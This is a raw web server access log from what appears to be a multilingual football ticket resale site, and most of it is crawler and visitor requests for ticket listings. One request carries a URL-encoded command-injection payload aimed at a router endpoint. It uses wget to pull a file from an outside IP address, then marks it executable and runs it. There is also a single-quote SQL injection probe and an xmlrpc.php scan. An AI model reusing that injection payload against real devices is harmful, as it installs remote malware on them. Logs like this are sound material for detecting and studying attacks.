66.249.79.173 - - [19/Jul/2024:06:20:20 +0200] "GET /ticket2/opencms/no/buy?page=1&edid=EC2BC309-3510-AA04-CA0C-F3088D5C1D31 HTTP/1.1" 200 100595
66.249.79.232 - - [19/Jul/2024:06:20:21 +0200] "GET /ticket2/opencms/fi/buy?page=1&edid=492C270D-AAEA-3890-F385-951BFDA8F433 HTTP/1.1" 200 101086
66.249.76.170 - - [19/Jul/2024:06:20:21 +0200] "GET /ticket2/opencms/en/magazine/article?title=second-place-second-year-in-a-row HTTP/1.1" 200 72307
194.163.141.13 - - [19/Jul/2024:06:20:28 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0750C6FE-B11D-02C8-6F08-958B2A2EF455&sortorder=asc&column=price HTTP/1.1" 200 88129
37.60.249.191 - - [19/Jul/2024:06:20:43 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=0CE65760-D75C-1E4C-DE34-E03273F5FD83&sortorder=asc&column=section HTTP/1.1" 404 -
194.163.141.13 - - [19/Jul/2024:06:20:55 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0750C6FE-B11D-02C8-6F08-958B2A2EF455&sortorder=asc&column=row HTTP/1.1" 200 88129
45.234.111.251 - - [19/Jul/2024:06:20:59 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/london/?gad_source=1&gclid=EAIaIQobChMIh___maKyhwMVk3V_AB0NMTN5EAAYASAFEgLImPD_BwE HTTP/1.1" 200 77467
47.128.115.242 - - [19/Jul/2024:06:21:09 +0200] "GET /ticket2/opencms/nl/buy/?edid=2873D448-9456-C769-305A-D313D730E942 HTTP/1.1" 200 70448
47.128.115.242 - - [19/Jul/2024:06:21:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.115.242 - - [19/Jul/2024:06:21:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.170 - - [19/Jul/2024:06:21:13 +0200] "GET /ticket2/opencms/no/magazine/article?title=jurgen-klopp-forlater-liverpool-en-suksesshistorie-pa-anfield HTTP/1.1" 200 76702
194.163.141.13 - - [19/Jul/2024:06:21:19 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0750C6FE-B11D-02C8-6F08-958B2A2EF455&sortorder=asc&column=section HTTP/1.1" 200 88129
40.77.167.235 - - [19/Jul/2024:06:21:20 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/premier_league/west_ham_united/ HTTP/1.1" 200 81975
194.163.141.13 - - [19/Jul/2024:06:21:43 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=090A82EB-84B2-523A-4E3E-E0A1CC3737FC&sortorder=desc&column=section HTTP/1.1" 200 87656
45.128.232.22 - - [19/Jul/2024:06:21:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 -
66.249.79.173 - - [19/Jul/2024:06:22:02 +0200] "GET /ticket2/opencms/de/buy/?page=1&edid=C50C359D-FED8-6125-4F08-37D85D558529 HTTP/1.1" 200 85944
194.163.141.13 - - [19/Jul/2024:06:22:08 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0B1DFE74-E96C-992F-F64C-5709A1D86A1D&sortorder=desc&column=price HTTP/1.1" 200 88545
114.119.158.193 - - [19/Jul/2024:06:22:16 +0200] "GET /ticket2/opencms/en/sell/?edid=57338448-5406-7945-312D-BF2768268B8F HTTP/1.1" 302 -
114.119.158.193 - - [19/Jul/2024:06:22:20 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
188.165.237.120 - - [19/Jul/2024:06:22:24 +0200] "GET /ticket2/opencms/se/robots.txt HTTP/1.1" 404 -
40.77.167.62 - - [19/Jul/2024:06:22:32 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=F1463EBE-6C18-CF49-B2AE-F79868BCA4F5 HTTP/1.1" 200 115455
194.163.141.13 - - [19/Jul/2024:06:22:34 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=0BF30F3A-8700-9494-9B5F-11B3D10DC49C&sortorder=desc&column=section HTTP/1.1" 200 85949
37.60.249.191 - - [19/Jul/2024:06:22:35 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=0CE65760-D75C-1E4C-DE34-E03273F5FD83&sortorder=desc&column=row HTTP/1.1" 404 -
188.165.237.120 - - [19/Jul/2024:06:22:40 +0200] "GET /ticket2/opencms/se/fi/buy/?page=1&edid=595B8CB0-570C-BECE-2B96-53CB04F64A65&sortorder=asc&column=price HTTP/1.1" 404 -
63.143.42.252 - - [19/Jul/2024:06:22:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
63.143.42.252 - - [19/Jul/2024:06:22:44 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
114.119.138.151 - - [19/Jul/2024:06:22:54 +0200] "GET /ticket2/opencms/en/venue/?venueid=988CFED4-6B4C-E666-FAD2-FF27363C6BC5 HTTP/1.1" 200 70819
194.163.141.13 - - [19/Jul/2024:06:22:54 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=100E525E-58FB-82FF-C4FD-53159AE7FD66&sortorder=desc&column=price HTTP/1.1" 200 87993
47.128.97.175 - - [19/Jul/2024:06:23:01 +0200] "GET /ticket2/opencms/fr/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=3B549160-8B9C-E872-44A9-20FEA86B30E8 HTTP/1.1" 200 82221
47.128.97.175 - - [19/Jul/2024:06:23:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.97.175 - - [19/Jul/2024:06:23:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
52.167.144.173 - - [19/Jul/2024:06:23:16 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=3AEE71D4-9186-E070-414D-987C08623A74 HTTP/1.1" 200 110404
66.249.76.161 - - [19/Jul/2024:06:23:19 +0200] "GET /ticket2/opencms/no/buy?page=1&edid=D11D82D4-28DA-1768-D317-EF521A2F97E6 HTTP/1.1" 200 116807
157.55.39.48 - - [19/Jul/2024:06:23:22 +0200] "GET /ticket2/opencms/en/buy/?page=10&eventid=B1E27EAD-2DAB-B132-68A0-815602472CC3&venueid=7BC1169D-C485-411D-5945-206D54A60C10 HTTP/1.1" 200 84055
194.163.141.13 - - [19/Jul/2024:06:23:24 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=100E525E-58FB-82FF-C4FD-53159AE7FD66&sortorder=desc&column=row HTTP/1.1" 200 87993
47.128.111.24 - - [19/Jul/2024:06:23:26 +0200] "GET /ticket2/opencms/nl/buy/?catid=A7674DEA-B39E-502C-2F76-760AE08947E9&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 80621
47.128.111.24 - - [19/Jul/2024:06:23:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.111.24 - - [19/Jul/2024:06:23:27 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.21.236 - - [19/Jul/2024:06:23:28 +0200] "GET /ticket2/opencms/nl/buy/?edid=3BDAF33D-50D2-45C6-26D6-3F2B5E36F1B0 HTTP/1.1" 200 70448
47.128.21.236 - - [19/Jul/2024:06:23:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.21.236 - - [19/Jul/2024:06:23:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.132.202 - - [19/Jul/2024:06:23:45 +0200] "GET /ticket2/opencms/en/sell/?edid=A1B37D0F-A4BD-02A4-1307-231B5EF99F2B HTTP/1.1" 302 -
114.119.132.202 - - [19/Jul/2024:06:23:49 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
194.163.141.13 - - [19/Jul/2024:06:23:50 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=19102562-E2A2-AF98-F707-B3F5DB2EE4C3&sortorder=desc&column=row HTTP/1.1" 200 89232
47.128.98.220 - - [19/Jul/2024:06:23:51 +0200] "GET /ticket2/opencms/de/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&npage=1 HTTP/1.1" 200 240658
47.128.98.220 - - [19/Jul/2024:06:23:51 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.98.220 - - [19/Jul/2024:06:23:52 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
52.167.144.182 - - [19/Jul/2024:06:24:03 +0200] "GET /ticket2/opencms/no/venue/?venueid=18FB7AFC-7A38-5857-B215-E761F79A5CBE HTTP/1.1" 200 72009
194.163.141.13 - - [19/Jul/2024:06:24:07 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=19E1E130-239D-825F-A5F3-74E3C641B339 HTTP/1.1" 200 88566
157.55.39.48 - - [19/Jul/2024:06:24:14 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/english-championship/west_bromwich/ HTTP/1.1" 200 73061
47.128.117.154 - - [19/Jul/2024:06:24:15 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B HTTP/1.1" 200 82445
47.128.117.154 - - [19/Jul/2024:06:24:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.117.154 - - [19/Jul/2024:06:24:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.168 - - [19/Jul/2024:06:24:20 +0200] "GET /ticket2/opencms/fi/venue/?venueid=3C42100B-58B0-2CFB-51D8-262D48BD2A0E HTTP/1.1" 200 72276
37.60.249.191 - - [19/Jul/2024:06:24:26 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=24AF829E-10D1-5180-8437-2DA5F16AB60A&sortorder=asc&column=row HTTP/1.1" 404 -
194.163.141.13 - - [19/Jul/2024:06:24:27 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1CACEC5F-B994-32DD-19DD-67E5A3F13C44&sortorder=desc&column=price HTTP/1.1" 200 85938
47.128.63.51 - - [19/Jul/2024:06:24:41 +0200] "GET /ticket2/opencms/no/buy/?catid=82F804FA-9F69-CB6B-D41D-7BF7C716058B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=AD8806A3-78A3-C85C-FD76-9A847D684299&page=6 HTTP/1.1" 200 82974
47.128.63.51 - - [19/Jul/2024:06:24:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.63.51 - - [19/Jul/2024:06:24:42 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
37.123.143.245 - - [19/Jul/2024:06:24:43 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:06:24:44 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
194.163.141.13 - - [19/Jul/2024:06:24:56 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1CACEC5F-B994-32DD-19DD-67E5A3F13C44&sortorder=desc&column=row HTTP/1.1" 200 85938
47.128.31.170 - - [19/Jul/2024:06:25:04 +0200] "GET /ticket2/opencms/fi/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=6F6C209F-41CD-D584-D276-D5324683B59C&page=7 HTTP/1.1" 200 97994
47.128.31.170 - - [19/Jul/2024:06:25:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.31.170 - - [19/Jul/2024:06:25:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:25:18 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1CACEC5F-B994-32DD-19DD-67E5A3F13C44&sortorder=desc&column=section HTTP/1.1" 200 85938
66.249.76.2 - - [19/Jul/2024:06:25:22 +0200] "GET /ticket2/opencms/de/buy/?page=1&edid=BA98F497-79D9-0BA1-3E19-B45BB0763E07 HTTP/1.1" 200 116863
47.128.57.247 - - [19/Jul/2024:06:25:28 +0200] "GET /ticket2/opencms/dk/buy/?catid=C871EAE3-C584-718A-9795-07CDEF43FA75&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 81626
47.128.57.247 - - [19/Jul/2024:06:25:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.57.247 - - [19/Jul/2024:06:25:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
114.119.135.232 - - [19/Jul/2024:06:25:32 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=9F79CA3E-C929-3DA5-172A-1CE96884033B HTTP/1.1" 200 87394
40.77.167.235 - - [19/Jul/2024:06:25:38 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/premier_league/ HTTP/1.1" 200 79883
194.163.141.13 - - [19/Jul/2024:06:25:43 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1EBC220F-DC4B-8D2C-D8E4-51D66799F0B5&sortorder=asc&column=section HTTP/1.1" 200 88496
37.60.249.191 - - [19/Jul/2024:06:25:46 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=2E56A8B0-155D-976C-348E-93E1C4B4957D&sortorder=desc&column=section HTTP/1.1" 404 -
47.128.21.220 - - [19/Jul/2024:06:25:46 +0200] "GET /ticket2/opencms/es/buy/?edid=D3BB5206-D09C-E9EC-0247-A3E56EA24028 HTTP/1.1" 200 72706
47.128.21.220 - - [19/Jul/2024:06:25:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.21.220 - - [19/Jul/2024:06:25:47 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.48.253 - - [19/Jul/2024:06:25:54 +0200] "GET /ticket2/opencms/sv/buy/?catid=D8B345C9-F7A5-E620-4B43-C34EB0D6885B&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&eventid=7C5A7BA8-D519-1CFD-C238-670704EE7DF9&page=6 HTTP/1.1" 200 100781
47.128.48.253 - - [19/Jul/2024:06:25:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.48.253 - - [19/Jul/2024:06:25:55 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
194.163.141.13 - - [19/Jul/2024:06:26:09 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F0062E5-B41B-134F-9FBF-4A7B26C9CCE3&sortorder=desc&column=price HTTP/1.1" 200 88538
47.128.115.205 - - [19/Jul/2024:06:26:18 +0200] "GET /ticket2/opencms/sv/magazine/article?title=linoel-messis-sista-sasong HTTP/1.1" 200 75640
66.249.79.231 - - [19/Jul/2024:06:26:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
47.128.115.205 - - [19/Jul/2024:06:26:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.115.205 - - [19/Jul/2024:06:26:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.79.232 - - [19/Jul/2024:06:26:23 +0200] "GET /ticket2/opencms/fr/buy?page=1&edid=34E20B61-76E4-1B1F-1E0B-8486E60BBF5B HTTP/1.1" 200 92141
66.249.68.69 - - [19/Jul/2024:06:26:24 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=B64E0F34-8F38-7972-6429-A3CAB0BC032F HTTP/1.1" 200 93234
41.216.188.113 - - [19/Jul/2024:06:26:28 +0200] "GET /ticket2/opencms/sv/magazine/article?title=vad-ar-fotboll HTTP/1.1" 200 77566
41.216.188.113 - - [19/Jul/2024:06:26:28 +0200] "GET /ticket2/opencms/sv/magazine/article?title=vad-ar-fotboll&title=%2527 HTTP/1.1" 200 77566
194.163.141.13 - - [19/Jul/2024:06:26:35 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F0062E5-B41B-134F-9FBF-4A7B26C9CCE3&sortorder=desc&column=section HTTP/1.1" 200 88538
47.128.57.198 - - [19/Jul/2024:06:26:44 +0200] "GET /ticket2/opencms/no/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=08F27F2A-1872-A39F-A97C-63093E77B18A HTTP/1.1" 200 82443
47.128.57.198 - - [19/Jul/2024:06:26:44 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.57.198 - - [19/Jul/2024:06:26:45 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
72.14.199.232 - - [19/Jul/2024:06:26:52 +0200] "GET /ticket2/opencms/dk/sport/fodboldbilletter/serie-a/ac_roma/ HTTP/1.1" 200 84258
194.163.141.13 - - [19/Jul/2024:06:27:01 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F39103F-E1B7-7C87-61F2-F032664DD922&sortorder=desc&column=row HTTP/1.1" 200 89197
194.163.141.13 - - [19/Jul/2024:06:27:15 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F546517-7633-42B2-A140-E9D704EF0B28&sortorder=desc&column=price HTTP/1.1" 200 88536
114.119.137.43 - - [19/Jul/2024:06:27:16 +0200] "GET /ticket2/opencms/en/sell/?edid=5595A96D-9F00-CDE0-D156-0165E9F7FC70 HTTP/1.1" 302 -
114.119.137.43 - - [19/Jul/2024:06:27:20 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
173.252.70.112 - - [19/Jul/2024:06:27:25 +0200] "GET /ticket2/opencms/sites/ticketbrokerage/sv/sport/fotbollsbiljetter/premier_league/sunderland/manchester_city.html HTTP/1.1" 404 -
66.249.79.231 - - [19/Jul/2024:06:27:26 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=D26CE87D-3D36-4995-7255-CD274E3D4B38 HTTP/1.1" 200 96137
37.60.249.191 - - [19/Jul/2024:06:27:29 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=30C89ECD-9C00-576C-AA0D-236F4C1FBD43&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.79.231 - - [19/Jul/2024:06:27:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/ticketbrokerage.css HTTP/1.1" 200 39339
63.143.42.252 - - [19/Jul/2024:06:27:41 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
194.163.141.13 - - [19/Jul/2024:06:27:41 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1F546517-7633-42B2-A140-E9D704EF0B28&sortorder=desc&column=row HTTP/1.1" 200 88536
63.143.42.252 - - [19/Jul/2024:06:27:44 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
111.229.164.63 - - [19/Jul/2024:06:27:58 +0200] "GET /ticket2/opencms/xmlrpc.php HTTP/1.1" 404 -
114.119.140.175 - - [19/Jul/2024:06:27:58 +0200] "GET /ticket2/opencms/en/venue/?venueid=931B960B-87A9-7EDC-AD2E-1CCD2CDDC26D HTTP/1.1" 200 70734
194.163.141.13 - - [19/Jul/2024:06:28:01 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1FCA645A-DEE0-EC18-0DE3-82C0541BBA3A&sortorder=asc&column=row HTTP/1.1" 200 87994
47.128.60.147 - - [19/Jul/2024:06:28:03 +0200] "GET /ticket2/opencms/nl/buy/?edid=207C2646-D7DC-44FF-090D-40B991F2D67E HTTP/1.1" 200 70448
47.128.60.147 - - [19/Jul/2024:06:28:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.60.147 - - [19/Jul/2024:06:28:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.45.20 - - [19/Jul/2024:06:28:23 +0200] "GET /ticket2/opencms/fi/venue/?venueid=F6924F27-E301-BC1C-E625-AF49CF33565E HTTP/1.1" 200 72309
47.128.45.20 - - [19/Jul/2024:06:28:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.45.20 - - [19/Jul/2024:06:28:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.2 - - [19/Jul/2024:06:28:27 +0200] "GET /ticket2/opencms/fr/sport/billets-football/premier_league/manchester_united/ HTTP/1.1" 200 86842
66.249.79.5 - - [19/Jul/2024:06:28:28 +0200] "GET /ticket2/opencms/fi/venue/?venueid=9D40C9A3-8CFF-BA15-AD1A-88E3EA85E042 HTTP/1.1" 200 72274
194.163.141.13 - - [19/Jul/2024:06:28:29 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1FCA645A-DEE0-EC18-0DE3-82C0541BBA3A&sortorder=asc&column=section HTTP/1.1" 200 87994
114.119.140.113 - - [19/Jul/2024:06:28:40 +0200] "GET /ticket2/opencms/en/sell/?edid=9F997AA4-4C9A-B0F5-45AE-3426BA42C8D8 HTTP/1.1" 302 -
114.119.140.113 - - [19/Jul/2024:06:28:44 +0200] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 72802
194.163.141.13 - - [19/Jul/2024:06:28:50 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=1FCA645A-DEE0-EC18-0DE3-82C0541BBA3A&sortorder=desc&column=section HTTP/1.1" 200 87993
72.14.199.231 - - [19/Jul/2024:06:28:53 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/premier_league/chelsea/ HTTP/1.1" 200 83820
37.60.249.191 - - [19/Jul/2024:06:29:02 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=312F925C-21EC-506E-3F79-878DE79022A7&sortorder=asc&column=price HTTP/1.1" 404 -
194.163.141.13 - - [19/Jul/2024:06:29:10 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=54FC36CF-650E-0DD5-1BB3-E49EF32EDF7E&sortorder=desc&column=section HTTP/1.1" 200 88735
47.128.43.203 - - [19/Jul/2024:06:29:16 +0200] "GET /ticket2/opencms/fi/buying_tickets/ HTTP/1.1" 200 74411
66.249.79.172 - - [19/Jul/2024:06:29:30 +0200] "GET /ticket2/opencms/de/buy/?page=1&edid=EC931FC2-E0FE-B476-9B4F-E95FF2037ED9 HTTP/1.1" 200 111813
47.128.43.203 - - [19/Jul/2024:06:29:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
194.163.141.13 - - [19/Jul/2024:06:29:32 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADBA15E4-3F4A-A815-69DB-A98CDD1E67EB&sortorder=asc&column=price HTTP/1.1" 200 88306
47.128.43.203 - - [19/Jul/2024:06:29:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
47.128.43.203 - - [19/Jul/2024:06:29:34 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/content/buy_tickets_fi.png HTTP/1.1" 200 15509
37.123.143.245 - - [19/Jul/2024:06:29:45 +0200] "GET /ticket2/opencms/system/workplace/views/top_foot.jsp?wpFrame=foot HTTP/1.1" 200 1211
37.123.143.245 - - [19/Jul/2024:06:29:45 +0200] "GET /ticket2/opencms/system/workplace/commons/style/workplace.css HTTP/1.1" 200 14209
114.119.136.185 - - [19/Jul/2024:06:29:53 +0200] "GET /ticket2/opencms/dk/dk/venue/?venueid=F95CCA03-8412-EF00-BE73-83772A0CB743 HTTP/1.1" 404 -
194.163.141.13 - - [19/Jul/2024:06:30:04 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADBA15E4-3F4A-A815-69DB-A98CDD1E67EB&sortorder=asc&column=section HTTP/1.1" 200 88306
47.128.125.92 - - [19/Jul/2024:06:30:08 +0200] "GET /ticket2/opencms/fr/magazine/article?title=jurgen-klopp-quitte-liverpool-une-histoire-de-succes-a-anfield HTTP/1.1" 200 77347
47.128.125.92 - - [19/Jul/2024:06:30:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.125.92 - - [19/Jul/2024:06:30:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
52.167.144.182 - - [19/Jul/2024:06:30:13 +0200] "GET /ticket2/opencms/fi/buy?page=1&edid=C8E47E46-ADCD-586A-7BE4-CF1C96256B2D HTTP/1.1" 200 112701
47.128.18.119 - - [19/Jul/2024:06:30:21 +0200] "GET /ticket2/opencms/fr/buy/?edid=1C109B19-215B-025B-D9B8-6D4E44843BBC HTTP/1.1" 200 72058
194.163.141.13 - - [19/Jul/2024:06:30:22 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADE200F3-CFF5-87E3-9021-7F29446BA859&sortorder=desc&column=price HTTP/1.1" 200 87885
47.128.18.119 - - [19/Jul/2024:06:30:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.18.119 - - [19/Jul/2024:06:30:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
66.249.76.2 - - [19/Jul/2024:06:30:24 +0200] "GET /ticket2/opencms/venue/Tottanham_Hotspur_Stadium.png HTTP/1.1" 200 43726
37.60.249.191 - - [19/Jul/2024:06:30:31 +0200] "GET /ticket2/opencms/dk/fi/buy/?page=1&edid=3930902F-44C9-0DA4-854E-41262D5A61CF&sortorder=desc&column=section HTTP/1.1" 404 -
101.44.162.93 - - [19/Jul/2024:06:30:43 +0200] "GET /ticket2/opencms/fi/buy/ HTTP/1.1" 200 72632
194.163.141.13 - - [19/Jul/2024:06:30:45 +0200] "GET /ticket2/opencms/no/buy/?page=1&edid=ADE200F3-CFF5-87E3-9021-7F29446BA859&sortorder=desc&column=row HTTP/1.1" 200 87885
66.249.76.167 - - [19/Jul/2024:06:31:01 +0200] "GET /ticket2/opencms/fi/venue/?venueid=599873B1-3873-AE39-BC85-F2D3640C7F65 HTTP/1.1" 200 72274
47.128.46.132 - - [19/Jul/2024:06:31:03 +0200] "GET /ticket2/opencms/nl/buy/?catid=0A6C99D2-F5BD-7A18-9A5F-5668827042E0&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&page=6 HTTP/1.1" 200 300653
47.128.46.132 - - [19/Jul/2024:06:31:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.46.132 - - [19/Jul/2024:06:31:04 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/footer-img.png HTTP/1.1" 200 10350
